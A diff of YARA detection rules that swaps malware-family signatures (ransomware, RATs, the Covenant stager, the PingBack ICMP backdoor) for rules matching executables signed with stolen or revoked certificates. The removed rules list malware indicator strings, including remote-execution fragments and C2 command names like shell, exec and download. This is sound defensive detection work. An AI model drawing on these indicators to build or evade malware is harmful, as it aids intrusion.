+		logic_hash = "7b717a86ba0a6c3c8ba59c7b7c97dae802c351340ad67a9baf3f526b084e995a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "ServiceCrtMain" fullword ascii
-		$s2 = "mpsvc.dll" fullword ascii
-		$o1 = { 84 db 0f 85 4c ff ff ff e8 14 06 00 00 8b f0 83 }
-		$o2 = { f7 c1 00 ff ff ff 75 c5 eb 13 0f ba 25 10 20 01 }
-		$o3 = { 8d 04 b1 8b d9 89 45 fc 8d 34 b9 a1 18 20 01 10 }
-		$o4 = { b0 01 c3 68 b8 2c 01 10 e8 83 ff ff ff c7 04 24 }
-		$o5 = { eb 34 66 0f 12 0d 00 fe 00 10 f2 0f 59 c1 ba cc }
-		$o6 = { 73 c7 dc 0d 4c ff 00 10 eb bf dd 05 34 ff 00 10 }
+		thumbprint = "b5cb5b256e47a30504392c37991e4efc4ce838fde4ad8df47456d30b417e6d5c"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* ) and 5 of ( $o* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "F.lux Software LLC" and pe.signatures [ i ] . serial == "22:36:7d:be:fd:0a:32:5c:38:93:af:52:54:7b:14:fa" )
 }
-rule DITEKSHEN_MALWARE_Win_Zeoticus : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00E04A344B397F752A45B128A594A3D6B5 : FILE
 {
 	meta:
-		description = "Detects Zeoticus ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6d1096dd-d075-54eb-ade9-48e2f945145d"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "85a7c3f7-a449-54ad-aac4-53f2a2c6c30e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5529-L5549"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1637-L1648"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "588c140c141e82dae56758550549dfb96410db50521ac546477e1adc5575b4a0"
+		logic_hash = "db3c854b68387aa5c6976783e6f79f99fe3389344b64d38c603d298128193e12"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Dear %s" fullword wide
-		$s2 = "\\??\\UNC\\%s\\%s\\" wide
-		$s3 = "\\\\%ws\\admin$\\%ws" wide
-		$s4 = "%s /node:\"%ws\" /user:\"%ws\" /password:" wide
-		$s5 = "process call create" wide
-		$s6 = ">----===Zeoticus" ascii
-		$s7 = "ZEOTICUSV2" ascii
-		$s8 = "GetExtendedTcpTable" fullword ascii
-		$s9 = "SHAMROckSWTF" ascii
-		$s10 = "NTDLL.RtlAllocateHeap" fullword ascii
-		$s11 = ".pandora" fullword wide
-		$s12 = { 70 00 20 00 72 00 20 00 69 00 20 00 76 00 20 00 65 00 20 00 74 }
-		$pdb = "_cryptor\\shell_gen\\Release\\" ascii
+		thumbprint = "d73229f3b7c2025a5a56e6e189be8a9120f1b3b0d8a78b7f62eff5c8d2293330"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( $pdb ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Highweb Ireland Operations Limited" and pe.signatures [ i ] . serial == "00:e0:4a:34:4b:39:7f:75:2a:45:b1:28:a5:94:a3:d6:b5" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent11 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00A7989F8Be0C82D35A19E7B3Dd4Be30E5 : FILE
 {
 	meta:
-		description = "Detects downloader agent"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c8bf9b1a-4ec1-5291-a334-82c79980ef53"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "0bb81ddc-b63b-534b-852f-7b0a2feeef9e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5551-L5564"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1650-L1661"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "61df4855766050237c0b67bf70684020beb5d88f5928fa2814077e505be938a6"
+		logic_hash = "66d600d97b5aca1aa9a302671f06aef0d5c4ae9829d6cb16f191bd4c59462d2e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$pdb = "\\loader2\\obj\\Debug\\loader2.pdb" ascii
-		$s1 = "DownloadFile" fullword ascii
-		$s2 = "ZipFile" fullword ascii
-		$s3 = "WebClient" fullword ascii
-		$s4 = "ExtractToDirectory" fullword ascii
-		$s5 = "System Clear" fullword ascii
+		thumbprint = "3e93aadb509b542c065801f04cffb34956f84ee8c322d65c7ae8e23d27fe5fbf"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( ( $pdb ) and 4 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Instamix Limited" and pe.signatures [ i ] . serial == "00:a7:98:9f:8b:e0:c8:2d:35:a1:9e:7b:3d:d4:be:30:e5" )
 }
-rule DITEKSHEN_MALWARE_Win_Softcnapp : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_39F56251Df2088223Cc03494084E6081 : FILE
 {
 	meta:
-		description = "Detects SoftCNApp"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "473442e2-d411-5e2b-948e-c7ce034a5810"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "4b5c27e0-0b3e-52e6-a867-1c2adadf3af3"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5566-L5583"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1663-L1674"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2d7f4320282218842fa2e82906bcaf691610ad1a6ea257a2a9fc9e062229a2e8"
+		logic_hash = "dc757f831b2537f12151f4f9e886ccf83bacfbcaea3ce12b2199f13ae00b199e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\\\.\\PIPE\\SOC%d" fullword ascii
-		$s2 = "Mozilla/5.0 (Windows NT 6.1)" fullword ascii
-		$s3 = "Param: sl=%d; sl=%d; sl=%d; sl=%d; sl=%d;" fullword ascii
-		$s4 = ".?AVCHPPlugin@@" fullword ascii
-		$s5 = ".?AVCHPCmd@@" fullword ascii
-		$s6 = ".?AVCHPExplorer@@" fullword ascii
-		$s7 = "%s\\svchost.exe -O" fullword wide
-		$s8 = "\"%s\\%s\" -P" fullword ascii
-		$n1 = "45.63.58.34" fullword ascii
-		$n2 = "127.0.0.1" fullword ascii
+		thumbprint = "66f32cf78b8f685a2c6f5bf361c9b0f9a9678de11a8e7931e2205d0ef65af05c"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( all of ( $n* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Inter Med Pty. Ltd." and pe.signatures [ i ] . serial == "39:f5:62:51:df:20:88:22:3c:c0:34:94:08:4e:60:81" )
 }
-rule DITEKSHEN_MALWARE_Win_Covenantgruntstager : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_009Cfbb4C69008821Aaacecde97Ee149Ab : FILE
 {
 	meta:
-		description = "Detects Covenant Grunt Stager"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "61495541-ed9c-5227-aa50-cbaeacfb20a2"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "0b0d815b-2232-5159-9b78-9227d9b2ec11"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5585-L5606"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1676-L1687"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "638f63f605b21154f062b0f4d0659cd6cd87aee319debb2c1a991a679fec087a"
+		logic_hash = "de04f12b1fb1e12860bf4ac077b700d180b8d412890922b75264319559fbd997"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "VXNlci1BZ2VudA" ascii wide
-		$x2 = "cGFnZT17R1VJRH0mdj0x" ascii wide
-		$x3 = "0eXBlPXtHVUlEfSZ2PTE" ascii wide
-		$x4 = "tZXNzYWdlPXtHVUlEfSZ2PTE" ascii wide
-		$x5 = "L2VuLXVzL" ascii wide
-		$x6 = "L2VuLXVzL2luZGV4Lmh0bWw" ascii wide
-		$x7 = "L2VuLXVzL2RvY3MuaHRtbD" ascii wide
-		$s1 = "ExecuteStager" ascii
-		$s2 = "UseCertPinning" fullword ascii
-		$s3 = "FromBase64String" fullword ascii
-		$s4 = "ToBase64String" fullword ascii
-		$s5 = "DownloadString" fullword ascii
-		$s6 = "UploadString" fullword ascii
-		$s7 = "GetWebRequest" fullword ascii
+		thumbprint = "6c7e917a2cc2b2228d6d4a0556bda6b2db9f06691749d2715af9a6a283ec987b"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or all of ( $s* ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kivaliz Prest s.r.l." and pe.signatures [ i ] . serial == "00:9c:fb:b4:c6:90:08:82:1a:aa:ce:cd:e9:7e:e1:49:ab" )
 }
-rule DITEKSHEN_MALWARE_Win_Fabookie : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_008Cff807Edaf368A60E4106906D8Df319 : FILE
 {
 	meta:
-		description = "Detects Fabookie / ElysiumStealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "dfa653c4-37d9-5e31-9c47-23adf751e4aa"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "ad8bed7f-3bc6-53d3-9e7a-0868e2ad267a"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5608-L5624"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1689-L1700"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bbe10323817d501a361a33abf61a49ad59fcac69d78d9d9ec1744ee99a4b4629"
+		logic_hash = "48752aff88cd3d546757a4220a64ca17cc9a5f00a42d2bc0571dedf5de769bc2"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "rwinssyslog" fullword wide
-		$s2 = "_kasssperskdy" fullword wide
-		$s3 = "[Title:%s]" fullword wide
-		$s4 = "[Execute]" fullword wide
-		$s5 = "[Snapshot]" fullword wide
-		$s6 = "Mozilla/4.0 (compatible)" fullword wide
-		$s7 = "d-k netsvcs" fullword wide
-		$s8 = "facebook.websmails.com" fullword wide
-		$s9 = "CUdpClient::Start" fullword ascii
+		thumbprint = "c97d809c73f376cdf8062329b357b16c9da9d14261895cd52400f845a2d6bdb1"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x0805 ) and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KRAFT BOKS OOO" and pe.signatures [ i ] . serial == "00:8c:ff:80:7e:da:f3:68:a6:0e:41:06:90:6d:8d:f3:19" )
 }
-rule DITEKSHEN_MALWARE_Win_Cobianrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2924785Fd7990B2D510675176Dae2Bed : FILE
 {
 	meta:
-		description = "Detects CobianRAT, a fork of Njrat"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "5a9b6f04-fc52-52a9-b72f-d24dd093e886"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "2aedb37c-8991-5750-b0c6-b9d6e7bb5e79"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5626-L5640"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1702-L1713"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5c8f55e5328b61c3591c876797b4521f8e98af7a6c53bab918f10d5c3c2b5013"
+		logic_hash = "dbdd714575d3c5f9554026fea97c6e91073d30cf728396111a5106303bb7b624"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "1.0.40.7" fullword wide
-		$s2 = "DownloadData" fullword wide
-		$s3 = "Executed As" fullword wide
-		$s4 = "\\Plugins" fullword wide
-		$s5 = "LOGIN" fullword wide
-		$s6 = "software\\microsoft\\windows\\currentversion\\run" wide
-		$s7 = "Hidden" fullword wide
+		thumbprint = "adbc44fda783b5fa817f66147d911fb81a0e2032a1c1527d1b3adbe55f9d682d"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Neoopt LLC" and pe.signatures [ i ] . serial == "29:24:78:5f:d7:99:0b:2d:51:06:75:17:6d:ae:2b:ed" )
 }
-rule DITEKSHEN_MALWARE_Win_Leivion : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_F2C4B99487Ed33396D77029B477494Bc : FILE
 {
 	meta:
-		description = "Detects Leivion"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "77800add-8fff-5657-9ed6-a23517bce0b1"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "594a5def-2516-5639-a72b-9b84b65de1e0"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5660-L5673"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1715-L1726"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a0cda23df4301b66feedad7c04b4d051c07474ccaa07c05598dd0b47bb6fc7e6"
+		logic_hash = "109d71674b652a2f42bb2a45c877d3a6cbfe280d0324f9ac8fa746d322440694"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "/var/lib/veil/go/src/runtime/mem_windows.go" fullword ascii
-		$s2 = "/var/lib/veil/go/src/internal/singleflight/singleflight.go" fullword ascii
-		$s3 = "/var/lib/veil/go/src/net/http/sniff.go" fullword ascii
-		$s4 = "/var/lib/veil/go/src/net/sendfile_windows.go" fullword ascii
-		$s5 = "/var/lib/veil/go/src/os/exec_" ascii
-		$s6 = "/var/lib/veil/go/src/runtime/mgcsweep.go" fullword ascii
+		thumbprint = "f38abffd259919d68969b8b2d265afac503a53dd"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bedaabaefadfdfedcbbbebaaef" and pe.signatures [ i ] . serial == "f2:c4:b9:94:87:ed:33:39:6d:77:02:9b:47:74:94:bc" )
 }
-rule DITEKSHEN_MALWARE_Win_Banload : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_C54Cccff8Acceb9654B6F585E2442Ef7 : FILE
 {
 	meta:
-		description = "Detects Banload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4672bce1-1280-576d-b7df-f0181a854058"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "c199b65f-5e95-5c6a-8ccc-7f343b867885"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5675-L5688"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1728-L1739"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5cbc69d11b73f60d6eee3f23ed6cc217ba37a3408cb69e396e0394b5a1e20b75"
+		logic_hash = "4be5e0f9f522f0d4096a63b001a02ea130ef56149dec7f0ac90be686b885cc4a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "main.die" fullword ascii
-		$s2 = "main.postResults" fullword ascii
-		$s3 = "main.checkin" fullword ascii
-		$s4 = "RegQueryValueExWRemoveDirectoryWSETTINGS_TIMEOUTTerminateProcessUpgrade RequiredUser-Agent: %s" ascii
-		$s5 = "pcuser-agentws2_32.dll (targetpc= DigestType ErrCode=%v" ascii
-		$s6 = "invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrie" fullword ascii
+		thumbprint = "416c79fccc5f42260cd227fd831b001aca14bf0d"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eadbebdebcc" and pe.signatures [ i ] . serial == "c5:4c:cc:ff:8a:cc:eb:96:54:b6:f5:85:e2:44:2e:f7" )
 }
-rule DITEKSHEN_MALWARE_Win_TYRAT : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_690910Dc89D7857C3500Fb74Bed2B08D : FILE
 {
 	meta:
-		description = "Detects TYRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "316c50cc-964e-5d24-b169-7a09fdf61638"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d10931e2-8abb-592b-a070-3767f286bd74"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5690-L5703"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1741-L1752"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b733b7aa3ba1195807fb728453c0f3f4df2177836054af6f7a863e14058884cb"
+		logic_hash = "62a1be8435f73f3768030feb6b5917d9a8075e7abac52e654231ba9d16ccc374"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "C:\\$MSIRecycle.Bin\\" fullword ascii
-		$s2 = "Range: bytes=%d-" fullword ascii
-		$s3 = "GET%sHTTP/1.1" fullword ascii
-		$s4 = "DllServer.dll" fullword ascii
-		$s5 = ".Bin\\bnch" ascii
-		$s6 = "User-Agent: wget" fullword ascii
+		thumbprint = "dfeb986812ba9f2af6d4ff94c5d1128fa50787951c07b4088f099a5701f1a1a4"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OLIMP STROI" and pe.signatures [ i ] . serial == "69:09:10:dc:89:d7:85:7c:35:00:fb:74:be:d2:b0:8d" )
 }
-rule DITEKSHEN_MALWARE_Win_Infinitylock : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Af9B523180F34A24Fcfd11B74E7D6Cd : FILE
 {
 	meta:
-		description = "Detects InfinityLock ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7a66cc19-c635-580b-abc2-b58bd48673bd"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d9ef3746-8b8e-5259-bcc4-408e27bc8ce3"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5705-L5723"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1754-L1765"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "634759f1c2d48becebc9c87e146e898524071738f74b7001b112dc793bcb581c"
+		logic_hash = "e06c87bddfc4fbb8918b7b1d64ec66b810a5a0c635c34d820b33c3cf9789229c"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "_Encrypted$" fullword ascii
-		$s2 = "PublicKeyToken=" fullword ascii nocase
-		$s3 = "GenerateHWID" fullword ascii
-		$s4 = "CreateKey" fullword ascii
-		$d1 = "ProgrammFiles" fullword ascii
-		$d2 = "OneDrive" fullword ascii
-		$d3 = "ProgrammsX86" fullword ascii
-		$d4 = "UserDirs" fullword ascii
-		$d5 = "B_Drive" fullword ascii
-		$pdb1 = "F:\\DESKTOP!\\ChkDsk\\ChkDsk\\obj\\" ascii
-		$pdb2 = "\\ChkDsk\\obj\\Debug\\PremiereCrack.pdb" ascii
+		thumbprint = "c8aec622951068734d754dc2efd7032f9ac572e26081ac38b8ceb333ccc165c9"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 1 of ( $d* ) ) or ( 4 of ( $d* ) and 2 of ( $s* ) ) or ( any of ( $pdb* ) and 1 of ( $s* ) and 1 of ( $d* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORBIS LTD" and pe.signatures [ i ] . serial == "0a:f9:b5:23:18:0f:34:a2:4f:cf:d1:1b:74:e7:d6:cd" )
 }
-rule DITEKSHEN_MALWARE_Win_Mountlocker : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00F4D2Def53Bccb0Dd2B7D54E4853A2Fc5 : FILE
 {
 	meta:
-		description = "Detects MountLocker ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0590d08d-1ee8-5dfe-af12-15b149acd2d6"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "8c1970b7-10b5-5976-a89c-a0d30f4b04af"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5725-L5740"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1767-L1778"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "30bc601fef60cc1c9d8bff5dd3f8a53214f088b74eb24fe2369f5664613e0eaf"
+		logic_hash = "0d9813d79f86ff22d5478469bee6cf457afe3780dd4308caa5da502faf816377"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "] locker.dir.check > " ascii wide
-		$s2 = "] locekr.kill." ascii wide
-		$s3 = "] locker.worm" ascii wide
-		$s4 = "%CLIENT_ID%" fullword ascii
-		$s5 = "RecoveryManual.html" ascii wide
-		$s6 = "RECOVERY MANUAL" ascii
-		$s7 = ".ReadManual.%0.8X" ascii wide
-		$s8 = "/?cid=%CLIENT_ID%" ascii
+		thumbprint = "d5431403ba7b026666e72c675aac6c46720583a60320c5c2c0f74331fe845c35"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PETROYL GROUP, TOV" and pe.signatures [ i ] . serial == "00:f4:d2:de:f5:3b:cc:b0:dd:2b:7d:54:e4:85:3a:2f:c5" )
 }
-rule DITEKSHEN_MALWARE_Win_Pingback : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_56D576A062491Ea0A5877Ced418203A1 : FILE
 {
 	meta:
-		description = "Detects PingBack ICMP backdoor"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ecb313b6-f923-5b6d-a4d7-a4650817ed84"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "94e29354-b6bc-5936-abc8-2b42d2e65294"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5742-L5761"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1780-L1791"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c5fa9ecefca1188ba5e81c0518f74023884ad0f66718fc030601cb458bdf2f12"
+		logic_hash = "877b773cb1bdc6c6c309374e95dc7eac4d525c681200169fcf492476f6335342"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Sniffer ok!" fullword ascii
-		$s2 = "recv icmp packet!" fullword ascii
-		$s3 = "WSASocket() failed: %d" fullword ascii
-		$s4 = "file on remote computers success" ascii
-		$s5 = "listen port error!" fullword ascii
-		$s6 = "\\PingBackService" ascii
-		$c1 = "exec" fullword ascii
-		$c2 = "rexec" fullword ascii
-		$c3 = "exep" fullword ascii
-		$c4 = "download" fullword ascii
-		$c5 = "upload" fullword ascii
-		$c6 = "shell" fullword ascii
+		thumbprint = "b22e022f030cf1e760a7df84d22e78087f3ea2ed262a4b76c8b133871c58213b"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or all of ( $c* ) or ( 4 of ( $c* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Silvo LLC" and pe.signatures [ i ] . serial == "56:d5:76:a0:62:49:1e:a0:a5:87:7c:ed:41:82:03:a1" )
 }
-rule DITEKSHEN_MALWARE_Win_Bazarloader : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4152169F22454Ed604D03555B7Afb175 : FILE
 {
 	meta:
-		description = "Detects BazarLoader variants"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6282df59-7244-501f-bb60-09a2a519bd47"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "61286549-7561-5607-9073-2a3ee0d54a44"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5763-L5776"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1793-L1804"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8febd1355bc03f71794ffb8d51cbb112e8acd2d26fec5bb736a388d5384e7747"
